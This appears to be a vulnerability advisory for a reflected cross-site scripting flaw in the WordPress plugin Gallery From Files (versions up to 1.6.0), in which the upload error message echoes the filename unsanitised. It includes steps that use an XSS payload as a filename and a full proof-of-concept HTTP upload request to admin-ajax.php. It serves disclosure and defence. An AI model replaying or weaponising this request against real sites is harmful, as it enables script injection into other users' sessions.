Gallery From Files <= 1.6.0 - Reflected Cross-Site Scripting (XSS)

2021-05-2600:00:00

Satyender Yadav

332

cross-site scripting

reflected

file upload

security vulnerability

EPSS

0.001

Percentile

33.4%

JSON

This plugin gives us the functionality of uploading images to the server. But filenames are not properly sanitized before being output in an error message when they have an invalid extension, leading to a reflected Cross-Site Scripting issue. Due to the lack of CSRF check, the attack could also be performed via such vector.

Steps : 

1. Rename any file to <img src=x onerror=alert(1337)>
2. Choose this file to upload and click on the button ( upload selected file )
3. When a file is uploading you will find that an alert box popped on-screen having content "1337"

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------245018834521283925753967681812
Content-Length: 506
Cookies: [any user or even unauthenticated]
Connection: close

-----------------------------245018834521283925753967681812
Content-Disposition: form-data; name="myfile[]"; filename="<img src onerror=alert(2)>"
Content-Type: image/png


-----------------------------245018834521283925753967681812
Content-Disposition: form-data; name="action"

gallery_from_files_595_fileupload
-----------------------------245018834521283925753967681812
Content-Disposition: form-data; name="filesName"

myfile
-----------------------------245018834521283925753967681812--

EPSS

0.001

Percentile

33.4%

JSON

Related for WPEX-ID:6BB4EB71-D702-4732-B01F-B723077D66CA